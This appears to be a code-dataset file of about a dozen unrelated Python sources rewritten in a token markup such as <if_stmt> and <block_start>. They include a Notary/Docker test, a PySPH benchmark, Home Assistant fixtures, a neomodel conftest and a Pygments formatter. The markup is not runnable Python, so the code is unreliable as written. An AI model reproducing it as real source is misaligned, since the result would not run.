<if_stmt>do_after_first_push<block_start>tag=docker_version+"_push_again"<line_sep>result[tag]=test_push(tempdir docker_version image tag=tag # 1.8.x and 1.9.x might fail to push again after snapshot rotation
# or delegation manipulation
allow_push_failure=re.compile(r"1\.[0-9](\.\d+)?$").search(docker_version))<block_end><for_stmt>ver DOCKERS<block_start><if_stmt>ver<ne>docker_version# 1.8.x and 1.9.x will fail to push if the repo was created by
# a more recent docker, since the key format has changed, or if a
# snapshot rotation or delegation has occurred
<block_start>can_fail=((do_after_first_push<or>re.compile(r"1\.[1-9][0-9](\.\d+)?$").search(docker_version))<and>re.compile(r"1\.[0-9](\.\d+)?$").search(ver))<line_sep>result[ver]=test_push(tempdir ver image allow_push_failure=can_fail)<block_end><block_end># find all the successfully pushed tags
expected_tags={}<for_stmt>ver result<block_start><if_stmt>isinstance(result[ver]["push"] dict)<block_start>expected_tags[ver]=result[ver]["push"]<block_end><block_end><with_stmt>open(os.path.join(tempdir "pull_a") 'wb')<as>fout<block_start><for_stmt>ver DOCKERS<block_start><try_stmt><block_start>test_pull_a(fout ver image expected_tags)<block_end><except_stmt>subprocess.CalledProcessError<block_start>result[ver]["pull-a"]="failed"<block_end><else_stmt><block_start>result[ver]["pull-a"]="success"<block_end><block_end><block_end><with_stmt>open(os.path.join(tempdir "notary_list") 'wb')<as>fout<block_start>targets=notary_list(fout image)<line_sep>assert_equality(len(targets) len(expected_tags))<for_stmt>tag,info expected_tags.iteritems()<block_start>found=[target<for>target targets<if>target[0]<eq>tag]<assert_stmt>found<line_sep>assert_equality(found[0][1:] [info["sha"] info["size"] "targets"])<block_end>result["list"]="listed expected targets successfully"<block_end><with_stmt>open(os.path.join(tempdir "build") 'wb')<as>fout<block_start><try_stmt><block_start>test_build(fout image docker_version)<block_end><except_stmt>subprocess.CalledProcessError<block_start>result[docker_version]["build"]="failed"<block_end><else_stmt><block_start>result[docker_version]["build"]="success"<block_end><block_end><with_stmt>open(os.path.join(tempdir "run") 'wb')<as>fout<block_start><try_stmt><block_start>test_run(fout image docker_version)<block_end><except_stmt>subprocess.CalledProcessError<block_start>result[docker_version]["run"]="failed"<block_end><else_stmt><block_start>result[docker_version]["run"]="success"<block_end><block_end><with_stmt>open(os.path.join(tempdir "result.json") 'wb')<as>fout<block_start>json.dump(result fout indent=2)<block_end><return>result<block_end><def_stmt>rotate_to_server_snapshot fout image<block_start>"""
Uses the notary client to rotate the snapshot key to be server-managed.
"""<line_sep>run_cmd("{notary}{debug} -d {trustdir} key rotate {gun} snapshot -r".format(notary=NOTARY_CLIENT trustdir=_TRUST_DIR gun=image debug=DEBUG) fout input=get_notary_usernamepass())<line_sep>run_cmd("{notary}{debug} -d {trustdir} publish {gun}".format(notary=NOTARY_CLIENT trustdir=_TRUST_DIR gun=image debug=DEBUG) fout input=get_notary_usernamepass())<block_end><def_stmt>test_all_docker_versions <block_start>"""
Initialize a repo with each docker version, and test that other docker
versions can read/write to it.
"""<line_sep>print("Output files at" _TEMPDIR)<line_sep>results=OrderedDict()<for_stmt>docker_version DOCKERS<block_start>clear_keys()<line_sep># test with just creating a regular repo
result=test_docker_version(docker_version)<line_sep>print("\nRepo created with docker {0}:".format(docker_version))<line_sep>print(json.dumps(result indent=2))<line_sep>results[docker_version]=result<line_sep># do snapshot rotation after creating the repo, and see if it's still ok
repo_name="repo_by_{0}_snapshot_rotation".format(docker_version)<line_sep>result=test_docker_version(docker_version repo_name=repo_name do_after_first_push=rotate_to_server_snapshot)<line_sep>print("\nRepo created with docker {0} and snapshot key rotated:".format(docker_version))<line_sep>print(json.dumps(result indent=2))<line_sep>results[docker_version+"_snapshot_rotation"]=result<block_end><with_stmt>open(os.path.join(_TEMPDIR "total_results.json") 'wb')<as>fout<block_start>json.dump(results fout indent=2)<block_end>print("\n\nFinal results:")<line_sep>results["output_dir"]=_TEMPDIR<line_sep>print(json.dumps(results indent=2))<block_end><if_stmt>__name__<eq>"__main__"<block_start>setup()<line_sep>test_all_docker_versions()<block_end>
|
"""SPHERIC benchmark case 6. (2 hours)
See http://spheric-sph.org/tests/test-6 for more details.
"""<line_sep># math
<import_from_stmt>math exp<line_sep># PySPH imports
<import_from_stmt>pysph.base.utils get_particle_array<import_from_stmt>pysph.base.kernels QuinticSpline<import_from_stmt>pysph.solver.solver Solver<import_from_stmt>pysph.solver.application Application<import_from_stmt>pysph.sph.integrator_step TwoStageRigidBodyStep TransportVelocityStep<import_from_stmt>pysph.sph.integrator Integrator<import_from_stmt>pysph.tools uniform_distribution<line_sep># SPH equations for this problem
<import_from_stmt>pysph.sph.equation Group Equation<import_from_stmt>pysph.sph.wc.transport_velocity SummationDensity StateEquation MomentumEquationPressureGradient MomentumEquationViscosity MomentumEquationArtificialStress SolidWallPressureBC SolidWallNoSlipBC SetWallVelocity<line_sep># domain and reference values
Lx=10.0<line_sep>Ly=5.0<line_sep>Umax=1.0<line_sep>c0=25.0<times>Umax<line_sep>rho0=1.0<line_sep>p0=c0<times>c0<times>rho0<line_sep># obstacle dimensions
obstacle_width=1.0<line_sep>obstacle_height=1.0<line_sep># Reynolds number and kinematic viscosity
Re=150<line_sep>nu=Umax<times>obstacle_width/Re<line_sep># Numerical setup
nx=50<line_sep>dx=0.20<times>Lx/nx<line_sep>nghost_layers=4<line_sep>ghost_extent=nghost_layers<times>dx<line_sep>hdx=1.2<line_sep># adaptive time steps
h0=hdx<times>dx<line_sep>dt_cfl=0.25<times>h0/(c0+Umax)<line_sep>dt_viscous=0.125<times>h0<power>2/nu<line_sep>dt_force=1.0<line_sep>tf=8.0<line_sep>dt=0.8<times>min(dt_cfl dt_viscous dt_force)<class_stmt>SPHERICBenchmarkAcceleration(Equation)<block_start>r"""Equation to set the acceleration for the moving square
benchmark problem.
We use scipy.optimize to fit the Gaussian:
.. math::
a \exp( -\frac{(t-b)^2}{2c^2} ) + d
to the SPHERIC Motion.dat file. The values for the parameters are
a = 2.8209512
b = 0.525652151
c = 0.14142151
d = -2.55580905e-08
Notes:
This equation must be instantiated with no sources
"""<def_stmt>loop self d_idx d_au t=0.0<block_start>a=2.8209512<line_sep>b=0.525652151<line_sep>c=0.14142151<line_sep>d=-2.55580905e-08<line_sep># compute the acceleration and set it for the destination
d_au[d_idx]=a<times>exp(-(t-b)<times>(t-b)/(2.0<times>c<times>c))+d<block_end><block_end><def_stmt>_get_interior x y<block_start>indices=[]<for_stmt>i range(x.size)<block_start><if_stmt>((x[i]<g>0.0)<and>(x[i]<l>Lx))<block_start><if_stmt>((y[i]<g>0.0)<and>(y[i]<l>Ly))<block_start>indices.append(i)<block_end><block_end><block_end><return>indices<block_end><def_stmt>_get_obstacle x y<block_start>indices=[]<for_stmt>i range(x.size)<block_start><if_stmt>((1.0<le>x[i]<le>2.0)<and>(2.0<le>y[i]<le>3.0))<block_start>indices.append(i)<block_end><block_end><return>indices<block_end><class_stmt>MovingSquare(Application)<block_start><def_stmt>_setup_particle_properties self particles volume<block_start>fluid,solid,obstacle=particles<line_sep>#### ADD PROPS FOR THE PARTICLES ###
# volume from number density
fluid.add_property('V')<line_sep>solid.add_property('V')<line_sep>obstacle.add_property('V')<line_sep># extrapolated velocities for the fluid
<for_stmt>name ['uf' 'vf' 'wf']<block_start>solid.add_property(name)<line_sep>obstacle.add_property(name)<block_end># dummy velocities for the solid and obstacle
# required for the no-slip BC
<for_stmt>name ['ug' 'vg' 'wg']<block_start>solid.add_property(name)<line_sep>obstacle.add_property(name)<block_end># advection velocities and accelerations for fluid
<for_stmt>name ('uhat' 'vhat' 'what' 'auhat' 'avhat' 'awhat' 'au' 'av' 'aw')<block_start>fluid.add_property(name)<block_end># kernel summation correction for solids
solid.add_property('wij')<line_sep>obstacle.add_property('wij')<line_sep># initial velocities and positions needed for the obstacle for
# rigid-body integration
obstacle.add_property('u0')<line_sep>obstacle.u0[:]=0.<line_sep>obstacle.add_property('v0')<line_sep>obstacle.v0[:]=0.<line_sep>obstacle.add_property('w0')<line_sep>obstacle.w0[:]=0.<line_sep>obstacle.add_property('x0')<line_sep>obstacle.add_property('y0')<line_sep>obstacle.add_property('z0')<line_sep># imposed accelerations on the solid and obstacle
solid.add_property('ax')<line_sep>solid.add_property('ay')<line_sep>solid.add_property('az')<line_sep>obstacle.add_property('ax')<line_sep>obstacle.add_property('ay')<line_sep>obstacle.add_property('az')<line_sep># magnitude of velocity squared
fluid.add_property('vmag2')<line_sep>#### SETUP PARTICLE PROPERTIES ###
# mass is set to get the reference density of rho0
fluid.m[:]=volume<times>rho0<line_sep>solid.m[:]=volume<times>rho0<line_sep>obstacle.m[:]=volume<times>rho0<line_sep># volume is set as dx^2
fluid.V[:]=1./volume<line_sep>solid.V[:]=1./volume<line_sep>obstacle.V[:]=1./volume<line_sep># smoothing lengths
fluid.h[:]=h0<line_sep>solid.h[:]=h0<line_sep>obstacle.h[:]=h0<line_sep># set the output arrays
fluid.set_output_arrays(['x' 'y' 'u' 'v' 'vmag2' 'rho' 'p' 'V' 'm' 'h'])<line_sep>solid.set_output_arrays(['x' 'y' 'rho' 'p'])<line_sep>obstacle.set_output_arrays(['x' 'y' 'u0' 'rho' 'p' 'u'])<line_sep>particles=[fluid solid obstacle]<line_sep><return>particles<block_end><def_stmt>add_user_options self group<block_start>group.add_argument("--hcp" action="store_true" dest="hcp" default=<false> help="Use hexagonal close packing of particles.")<block_end><def_stmt>create_particles self<block_start>hcp=self.options.hcp<line_sep># Initial distribution using Hexagonal close packing of particles
# create all particles
<global>dx<if_stmt>hcp<block_start>x,y,dx,dy,xmin,xmax,ymin,ymax=uniform_distribution.uniform_distribution_hcp2D(dx=dx xmin=-ghost_extent xmax=Lx+ghost_extent ymin=-ghost_extent ymax=Ly+ghost_extent)<block_end><else_stmt><block_start>x,y,dx,dy,xmin,xmax,ymin,ymax=uniform_distribution.uniform_distribution_cubic2D(dx=dx xmin=-ghost_extent xmax=Lx+ghost_extent ymin=-ghost_extent ymax=Ly+ghost_extent)<block_end>x=x.ravel()<line_sep>y=y.ravel()<line_sep># create the basic particle array
solid=get_particle_array(name='solid' x=x y=y)<line_sep># now sort out the interior from all particles
indices=_get_interior(solid.x solid.y)<line_sep>fluid=solid.extract_particles(indices)<line_sep>fluid.set_name('fluid')<line_sep>solid.remove_particles(indices)<line_sep># sort out the obstacle from the interior
indices=_get_obstacle(fluid.x fluid.y)<line_sep>obstacle=fluid.extract_particles(indices)<line_sep>obstacle.set_name('obstacle')<line_sep>fluid.remove_particles(indices)<line_sep>print("SPHERIC benchmark 6 :: Re = %d, nfluid = %d, nsolid=%d, nobstacle = %d, dt = %g"%(Re fluid.get_number_of_particles() solid.get_number_of_particles() obstacle.get_number_of_particles() dt))<line_sep># setup requisite particle properties and initial conditions
<if_stmt>hcp<block_start>wij_sum=uniform_distribution.get_number_density_hcp(dx dy kernel h0)<line_sep>volume=1./wij_sum<block_end><else_stmt><block_start>volume=dx<times>dy<block_end>particles=self._setup_particle_properties([fluid solid obstacle] volume=volume)<line_sep><return>particles<block_end><def_stmt>create_solver self<block_start>kernel=QuinticSpline(dim=2)<line_sep>integrator=Integrator(fluid=TransportVelocityStep() obstacle=TwoStageRigidBodyStep())<line_sep>solver=Solver(kernel=kernel dim=2 integrator=integrator tf=tf dt=dt adaptive_timestep=<false> output_at_times=[1.0 2.0 3.0 4.0 5.0 6.0 7.0])<line_sep><return>solver<block_end><def_stmt>create_equations self<block_start>equations=[# set the acceleration for the obstacle using the special function
# mimicking the accelerations provided in the test.
Group(equations=[SPHERICBenchmarkAcceleration(dest='obstacle' sources=<none>) ] real=<false>) # Summation density along with volume summation for the fluid
# phase. This is done for all local and remote particles. At the
# end of this group, the fluid phase has the correct density
# taking into consideration the fluid and solid
# particles.
Group(equations=[SummationDensity(dest='fluid' sources=['fluid' 'solid' 'obstacle']) ] real=<false>) # Once the fluid density is computed, we can use the EOS to set
# the fluid pressure. Additionally, the dummy velocity for the
# channel is set, which is later used in the no-slip wall BC.
Group(equations=[StateEquation(dest='fluid' sources=<none> p0=p0 rho0=rho0 b=1.0) SetWallVelocity(dest='solid' sources=['fluid']) SetWallVelocity(dest='obstacle' sources=['fluid']) ] real=<false>) # Once the pressure for the fluid phase has been updated, we can
# extrapolate the pressure to the ghost particles. After this
# group, the fluid density, pressure and the boundary pressure has
# been updated and can be used in the integration equations.
Group(equations=[SolidWallPressureBC(dest='obstacle' sources=['fluid'] b=1.0 rho0=rho0 p0=p0) SolidWallPressureBC(dest='solid' sources=['fluid'] b=1.0 rho0=rho0 p0=p0) ] real=<false>) # The main accelerations block. The acceleration arrays for the
# fluid phase are updated in this stage for all local particles.
Group(equations=[# Pressure gradient terms
MomentumEquationPressureGradient(dest='fluid' sources=['fluid' 'solid' 'obstacle'] pb=p0) # fluid viscosity
MomentumEquationViscosity(dest='fluid' sources=['fluid'] nu=nu) # No-slip boundary condition. This is effectively a
# viscous interaction of the fluid with the ghost
# particles.
SolidWallNoSlipBC(dest='fluid' sources=['solid' 'obstacle'] nu=nu) # Artificial stress for the fluid phase
MomentumEquationArtificialStress(dest='fluid' sources=['fluid']) ] real=<true>) ]<line_sep><return>equations<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>app=MovingSquare()<line_sep>app.run()<block_end>
|
# Copyright (c) 2022 NVIDIA CORPORATION. All rights reserved.
# NVIDIA CORPORATION and its licensors retain all intellectual property
# and proprietary rights in and to this software, related documentation
# and any modifications thereto. Any use, reproduction, disclosure or
# distribution of this software and related documentation without an express
# license agreement from NVIDIA CORPORATION is strictly prohibited.
# for autocomplete on builtins
#from warp.stubs import *
<import_from_stmt>warp.types array array2d array3d array4d constant<import_from_stmt>warp.types int8 uint8 int16 uint16 int32 uint32 int64 uint64 float32 float64<import_from_stmt>warp.types vec2 vec3 vec4 mat22 mat33 mat44 quat transform spatial_vector spatial_matrix<import_from_stmt>warp.types Mesh HashGrid Volume<import_from_stmt>warp.context init func kernel runtime<import_from_stmt>warp.context is_cpu_available is_cuda_available is_device_available<import_from_stmt>warp.context get_devices get_preferred_device<import_from_stmt>warp.context zeros zeros_like clone empty empty_like copy from_numpy launch synchronize force_load<import_from_stmt>warp.context set_module_options get_module_options get_module<import_from_stmt>warp.context capture_begin capture_end capture_launch<import_from_stmt>warp.context print_builtins export_builtins export_stubs<import_from_stmt>warp.context Kernel Function<import_stmt>warp.builtins<import_from_stmt>warp.tape Tape<import_from_stmt>warp.utils ScopedTimer ScopedCudaGuard<import_from_stmt>warp.utils transform_expand<line_sep># optional on PyTorch being installed
<try_stmt><block_start><import_from_stmt>warp.torch from_torch<import_from_stmt>warp.torch to_torch<block_end><except_stmt>ModuleNotFoundError<block_start><pass><block_end># optional on USD being installed
<try_stmt><block_start><import_stmt>warp.render<block_end><except_stmt>ModuleNotFoundError<block_start><pass><block_end>
|
"""Fixtures for Luftdaten tests."""<import_from_future_stmt> annotations<import_from_stmt>collections.abc Generator<import_from_stmt>unittest.mock MagicMock patch<import_stmt>pytest<import_from_stmt>homeassistant.components.luftdaten.const CONF_SENSOR_ID DOMAIN<import_from_stmt>homeassistant.const CONF_SHOW_ON_MAP<import_from_stmt>homeassistant.core HomeAssistant<import_from_stmt>tests.common MockConfigEntry<line_sep>@pytest.fixture<def_stmt>mock_config_entry <arrow>MockConfigEntry<block_start>"""Return the default mocked config entry."""<line_sep><return>MockConfigEntry(title="12345" domain=DOMAIN data={CONF_SENSOR_ID:12345 CONF_SHOW_ON_MAP:<true>} unique_id="12345" )<block_end>@pytest.fixture<def_stmt>mock_setup_entry <arrow>Generator[<none> <none> <none>]<block_start>"""Mock setting up a config entry."""<with_stmt>patch("homeassistant.components.luftdaten.async_setup_entry" return_value=<true>)<block_start><yield><block_end><block_end>@pytest.fixture<def_stmt>mock_luftdaten_config_flow <arrow>Generator[<none> MagicMock <none>]<block_start>"""Return a mocked Luftdaten client."""<with_stmt>patch("homeassistant.components.luftdaten.config_flow.Luftdaten" autospec=<true>)<as>luftdaten_mock<block_start>luftdaten=luftdaten_mock.return_value<line_sep>luftdaten.validate_sensor.return_value=<true><line_sep><yield>luftdaten<block_end><block_end>@pytest.fixture<def_stmt>mock_luftdaten <arrow>Generator[<none> MagicMock <none>]<block_start>"""Return a mocked Luftdaten client."""<with_stmt>patch("homeassistant.components.luftdaten.Luftdaten" autospec=<true>)<as>luftdaten_mock<block_start>luftdaten=luftdaten_mock.return_value<line_sep>luftdaten.sensor_id=12345<line_sep>luftdaten.meta={"altitude":123.456 "latitude":56.789 "longitude":12.345 "sensor_id":12345 }<line_sep>luftdaten.values={"humidity":34.70 "P1":8.5 "P2":4.07 "pressure_at_sealevel":103102.13 "pressure":98545.00 "temperature":22.30 }<line_sep><yield>luftdaten<block_end><block_end>@pytest.fixture<async_keyword><def_stmt>init_integration hass:HomeAssistant mock_config_entry:MockConfigEntry mock_luftdaten:MagicMock<arrow>MockConfigEntry<block_start>"""Set up the Luftdaten integration for testing."""<line_sep>mock_config_entry.add_to_hass(hass)<line_sep><await>hass.config_entries.async_setup(mock_config_entry.entry_id)<line_sep><await>hass.async_block_till_done()<line_sep><return>mock_config_entry<block_end>
|
# Copyright (c) Facebook, Inc. and its affiliates.
<import_from_stmt>. register_ade20k_full register_ade20k_panoptic register_coco_stuff_10k register_mapillary_vistas <line_sep>
|
"""
A full binary tree is a tree in which every node has either 0 or 2 children
"""<class_stmt>Node<block_start><def_stmt>__init__ self val<block_start>self.val=val<line_sep>self.left=<none><line_sep>self.right=<none><block_end><block_end><def_stmt>check root<block_start><if_stmt><not>root<block_start><return><true><block_end><if_stmt><not>root.left<and><not>root.right<block_start><return><true><block_end><if_stmt>root.left<and>root.right<block_start><return>check(root.left)<and>check(root.right)<block_end><block_end>root=Node(0)<line_sep>root.left=Node(1)<line_sep>root.right=Node(2)<if_stmt>check(root)<block_start>print('True')<block_end><else_stmt><block_start>print("False")<block_end>
|
<import_from_stmt>rest_framework.serializers ModelSerializer<import_from_stmt>django_jalali.serializers.serializerfield JDateField JDateTimeField <import_from_stmt>.models Bar BarTime<class_stmt>JDateFieldSerializer(ModelSerializer)<block_start>date=JDateField()<class_stmt>Meta<block_start>model=Bar<line_sep>exclude=[]<block_end><block_end><class_stmt>JDateTimeFieldSerializer(ModelSerializer)<block_start>datetime=JDateTimeField()<class_stmt>Meta<block_start>model=BarTime<line_sep>exclude=[]<block_end><block_end>
|
<import_from_future_stmt> print_function<import_stmt>warnings<import_stmt>os<import_stmt>sys<import_stmt>pytest<import_from_stmt>neomodel config db clear_neo4j_database change_neo4j_password<import_from_stmt>neo4j.exceptions ClientError<as>CypherError<import_from_stmt>neobolt.exceptions ClientError<def_stmt>pytest_addoption parser<block_start>"""
Adds the command line option --resetdb.
:param parser: The parser object. Please see <https://docs.pytest.org/en/latest/reference.html#_pytest.hookspec.pytest_addoption>`_
:type Parser object: For more information please see <https://docs.pytest.org/en/latest/reference.html#_pytest.config.Parser>`_
"""<line_sep>parser.addoption("--resetdb" action="store_true" help="Ensures that the database is clear prior to running tests for neomodel" default=<false>)<block_end><def_stmt>pytest_sessionstart session<block_start>"""
Provides initial connection to the database and sets up the rest of the test suite
:param session: The session object. Please see <https://docs.pytest.org/en/latest/reference.html#_pytest.hookspec.pytest_sessionstart>`_
:type Session object: For more information please see <https://docs.pytest.org/en/latest/reference.html#session>`_
"""<line_sep>warnings.simplefilter('default')<line_sep>config.DATABASE_URL=os.environ.get('NEO4J_BOLT_URL' 'bolt://neo4j:foobar@localhost:7687')<line_sep>config.AUTO_INSTALL_LABELS=<true><try_stmt># Clear the database if required
<block_start>database_is_populated,_=db.cypher_query("MATCH (a) return count(a)>0 as database_is_populated")<if_stmt>database_is_populated[0][0]<and><not>session.config.getoption("resetdb")<block_start><raise>SystemError("Please note: The database seems to be populated.\n\tEither delete all nodes and edges manually, or set the --resetdb parameter when calling pytest\n\n\tpytest --resetdb.")<block_end><else_stmt><block_start>clear_neo4j_database(db clear_constraints=<true> clear_indexes=<true>)<block_end><block_end><except_stmt>(CypherError ClientError)<as>ce# Handle instance without password being changed
<block_start><if_stmt>'The credentials you provided were valid, but must be changed before you can use this instance'<in>str(ce)<block_start>warnings.warn("New database with no password set, setting password to '<PASSWORD>'")<try_stmt><block_start>change_neo4j_password(db 'test')<line_sep># Ensures that multiprocessing tests can use the new password
config.DATABASE_URL='bolt://neo4j:test@localhost:7687'<line_sep>db.set_connection('bolt://neo4j:test@localhost:7687')<line_sep>warnings.warn("Please 'export NEO4J_BOLT_URL=bolt://neo4j:test@localhost:7687' for subsequent test runs")<block_end><except_stmt>(CypherError ClientError)<as>e<block_start><if_stmt>'The credentials you provided were valid, but must be changed before you can use this instance'<in>str(e)<block_start>warnings.warn("You appear to be running on version 4.0+ of Neo4j, without having changed the password."<concat>"Please manually log in, change your password, then update the config.DATABASE_URL call at line 32 in this file")<block_end><else_stmt><block_start><raise>e<block_end><block_end><block_end><else_stmt><block_start><raise>ce<block_end><block_end><block_end><def_stmt>version_to_dec a_version_string<block_start>"""
Converts a version string to a number to allow for quick checks on the versions of specific components.
:param a_version_string: The version string under test (e.g. '3.4.0')
:type a_version_string: str
:return: An integer representation of the string version, e.g. '3.4.0' --> 340
"""<line_sep>components=a_version_string.split('.')<while_stmt>len(components)<l>3<block_start>components.append('0')<block_end>num=0<for_stmt>a_component enumerate(components)<block_start>num<augadd>(10<power>((len(components)-1)-a_component[0]))<times>int(a_component[1])<block_end><return>num<block_end><def_stmt>check_and_skip_neo4j_least_version required_least_neo4j_version message<block_start>"""
Checks if the NEO4J_VERSION is at least `required_least_neo4j_version` and skips a test if not.
WARNING: If the NEO4J_VERSION variable is not set, this function does not skip the test, allowing it to go ahead.
:param required_least_neo4j_version: The least version to check. This must be the numeric representation of the
version. That is: '3.4.0' would be passed as 340.
:type required_least_neo4j_version: int
:param message: An informative message as to why the calling test had to be skipped.
:type message: str
:return: None. The calling test is skipped via pytest.skip if the reported version is below `required_least_neo4j_version`
"""<if_stmt>'NEO4J_VERSION'<in>os.environ<block_start><if_stmt>version_to_dec(os.environ['NEO4J_VERSION'])<l>required_least_neo4j_version<block_start>pytest.skip('Neo4j version: {}. {}.'<concat>'Skipping test.'.format(os.environ['NEO4J_VERSION'] message))<block_end><block_end><block_end>@pytest.fixture<def_stmt>skip_neo4j_before_330 <block_start>check_and_skip_neo4j_least_version(330 'Neo4J version does not support this test')<block_end>
|
"""lock_labs.py zips and password-protects labs.
$ tools/lock_labs.py
"""<import_from_stmt>absl app<import_from_stmt>pathlib Path<import_stmt>getpass<import_stmt>os<import_stmt>pyminizip<def_stmt>main argv<block_start>password=<none><line_sep>home=str(Path.home())<line_sep>password_file=os.path.join(home '.amli')<if_stmt>os.path.exists(password_file)<block_start><with_stmt>open(password_file)<as>f<block_start>password=f.read().replace('\n' '')<block_end><block_end><else_stmt><block_start>password=getpass.getpass("Password: ")<block_end><for_stmt>root,_,files os.walk('content')<block_start><for_stmt>name files<block_start><if_stmt>name.endswith('-key.ipynb')<block_start>lname=os.path.join(root name)<line_sep>zname=lname.replace('.ipynb' '.zip')<if_stmt>os.path.exists(zname)<block_start>os.remove(zname)<block_end>pyminizip.compress(lname root zname password 0)<line_sep>os.remove(lname)<block_end><block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>app.run(main)<block_end>
|
# -*- coding: utf-8 -*-
<import_from_stmt>pygments.formatter Formatter<import_from_stmt>pygments.token Keyword Name Comment String Error Number Operator Generic Token Whitespace <import_from_stmt>pygments.util get_choice_opt<line_sep>COMMAND_COLORS={Token:("" "") Whitespace:("fg=white" "fg=black;options=bold") Comment:("fg=white" "fg=black;options=bold") Comment.Preproc:("fg=cyan" "fg=cyan;options=bold") Keyword:("fg=blue" "fg=blue;options=bold") Keyword.Type:("fg=cyan" "fg=cyan;options=bold") Operator.Word:("fg=magenta" "fg=magenta;options=bold") Name.Builtin:("fg=cyan" "fg=cyan;options=bold") Name.Function:("fg=green" "fg=green;option=bold") Name.Namespace:("fg=cyan;options=underline" "fg=cyan;options=bold,underline") Name.Class:("fg=green;options=underline" "fg=green;options=bold,underline") Name.Exception:("fg=cyan" "fg=cyan;options=bold") Name.Decorator:("fg=black;options=bold" "fg=white") Name.Variable:("fg=red" "fg=red;options=bold") Name.Constant:("fg=red" "fg=red;options=bold") Name.Attribute:("fg=cyan" "fg=cyan;options=bold") Name.Tag:("fg=blue;options=bold" "fg=blue;options=bold") String:("fg=yellow" "fg=yellow") Number:("fg=blue" "fg=blue;options=bold") Generic.Deleted:("fg=red;options=bold" "fg=red;options=bold") Generic.Inserted:("fg=green" "fg=green;options=bold") Generic.Heading:("options=bold" "option=bold") Generic.Subheading:("fg=magenta;options=bold" "fg=magenta;options=bold") Generic.Prompt:("options=bold" "options=bold") Generic.Error:("fg=red;options=bold" "fg=red;options=bold") Error:("fg=red;options=bold,underline" "fg=red;options=bold,underline") }<class_stmt>CommandFormatter(Formatter)<block_start>r"""
Format tokens with Cleo color sequences, for output in a text console.
Color sequences are terminated at newlines, so that paging the output
works correctly.
The `get_style_defs()` method doesn't do anything special since there is
no support for common styles.
Options accepted:
`bg`
Set to ``"light"`` or ``"dark"`` depending on the terminal's background
(default: ``"light"``).
`colorscheme`
A dictionary mapping token types to (lightbg, darkbg) color names or
``None`` (default: ``None`` = use builtin colorscheme).
`linenos`
Set to ``True`` to have line numbers on the terminal output as well
(default: ``False`` = no line numbers).
"""<line_sep>name="Command"<line_sep>aliases=["command"]<line_sep>filenames=[]<def_stmt>__init__ self **options<block_start>Formatter.__init__(self **options)<line_sep>self.darkbg=(get_choice_opt(options "bg" ["light" "dark"] "light")<eq>"dark")<line_sep>self.colorscheme=options.get("colorscheme" <none>)<or>COMMAND_COLORS<line_sep>self.linenos=options.get("linenos" <false>)<line_sep>self._lineno=0<block_end><def_stmt>format self tokensource outfile<block_start><return>Formatter.format(self tokensource outfile)<block_end><def_stmt>_write_lineno self outfile<block_start>self._lineno<augadd>1<line_sep>outfile.write("%s%04d: "%(self._lineno<ne>1<and>"\n"<or>"" self._lineno))<block_end><def_stmt>_get_color self ttype# self.colorscheme is a dict containing usually generic types, so we
# have to walk the tree of dots. The base Token type must be a key,
# even if it's an empty string, as in the default above.
<block_start>colors=self.colorscheme.get(ttype)<while_stmt>colors<is><none><block_start>ttype=ttype.parent<line_sep>colors=self.colorscheme.get(ttype)<block_end><return>colors[self.darkbg]<block_end><def_stmt>format_unencoded self tokensource outfile<block_start><if_stmt>self.linenos<block_start>self._write_lineno(outfile)<block_end><for_stmt>ttype,value tokensource<block_start>color=self._get_color(ttype)<for_stmt>line value.splitlines(<true>)<block_start><if_stmt>color<block_start>outfile.write("<%s>%s</>"%(color line.rstrip("\n")))<block_end><else_stmt><block_start>outfile.write(line.rstrip("\n"))<block_end><if_stmt>line.endswith("\n")<block_start><if_stmt>self.linenos<block_start>self._write_lineno(outfile)<block_end><else_stmt><block_start>outfile.write("\n")<block_end><block_end><block_end><block_end><if_stmt>self.linenos<block_start>outfile.write("\n")<block_end><block_end><block_end>
|
"""
Configuring PyGMT defaults
==========================
Default GMT parameters can be set globally or locally using
:class:`pygmt.config`.
"""<line_sep># sphinx_gallery_thumbnail_number = 3
<import_stmt>pygmt<line_sep>###############################################################################
# Configuring default GMT parameters
# ----------------------------------
#
# Users can override default parameters either temporarily (locally) or
# permanently (globally) using :meth:`pygmt.config`. The full list of default
# parameters that can be changed can be found at :gmt-docs:`gmt.conf.html`.
#
# We demonstrate the usage of :meth:`pygmt.config` by configuring a map plot.
# Start with a basic figure with the default style
fig=pygmt.Figure()<line_sep>fig.basemap(region=[115 119.5 4 7.5] projection="M10c" frame=<true>)<line_sep>fig.coast(land="black" water="skyblue")<line_sep>fig.show()<line_sep>###############################################################################
# Globally overriding defaults
# ----------------------------
#
# The ``MAP_FRAME_TYPE`` parameter specifies the style of map frame to use, of
# which there are 5 options: ``fancy`` (default, seen above), ``fancy+``,
# ``plain``, ``graph`` (which does not apply to geographical maps) and
# ``inside``.
#
# The ``FORMAT_GEO_MAP`` parameter controls the format of geographical tick
# annotations. The default uses degrees and minutes. Here we specify the ticks
# to be a decimal number of degrees.
fig=pygmt.Figure()<line_sep># Configuration for the 'current figure'.
pygmt.config(MAP_FRAME_TYPE="plain")<line_sep>pygmt.config(FORMAT_GEO_MAP="ddd.xx")<line_sep>fig.basemap(region=[115 119.5 4 7.5] projection="M10c" frame=<true>)<line_sep>fig.coast(land="black" water="skyblue")<line_sep>fig.show()<line_sep>###############################################################################
# Locally overriding defaults
# ---------------------------
#
# It is also possible to temporarily override the default parameters, which is
# very useful for limiting the scope of changes to a particular plot.
# :class:`pygmt.config` is implemented as a context manager, which handles the
# setup and teardown of a GMT session. Python users are likely familiar with
# the ``with open(...) as file:`` snippet, which returns a ``file`` context
# manager. In this way, it can be used to override a parameter for a single
# command, or a sequence of commands. An application of :class:`pygmt.config`
# as a context manager is shown below:
fig=pygmt.Figure()<line_sep># This will have a fancy+ frame
<with_stmt>pygmt.config(MAP_FRAME_TYPE="fancy+")<block_start>fig.basemap(region=[115 119.5 4 7.5] projection="M10c" frame=<true>)<block_end>fig.coast(land="black" water="skyblue")<line_sep># Shift plot origin down by 10cm to plot another map
fig.shift_origin(yshift="-10c")<line_sep># This figure retains the default "fancy" frame
fig.basemap(region=[115 119.5 4 7.5] projection="M10c" frame=<true>)<line_sep>fig.coast(land="black" water="skyblue")<line_sep>fig.show()<line_sep>
|
# <NAME>
# http://gumuz.looze.net/
<def_stmt>split_seq seq size<block_start>""" Split up seq in pieces of size """<line_sep><return>[seq[i:i+size]<for>i range(0 len(seq) size)]<block_end>
|
